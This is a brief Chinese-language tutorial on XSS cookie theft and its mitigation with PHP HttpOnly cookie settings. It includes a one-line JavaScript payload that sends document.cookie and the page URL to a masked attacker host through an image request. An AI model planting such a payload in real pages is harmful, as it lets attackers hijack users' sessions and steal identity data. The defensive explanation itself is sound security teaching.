xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;
- //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
- ini_set("session.cookie_httponly", 1);
- //或者setcookie()的第七个参数设置为true
- session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
- header("Set-Cookie: hidden=value; httpOnly");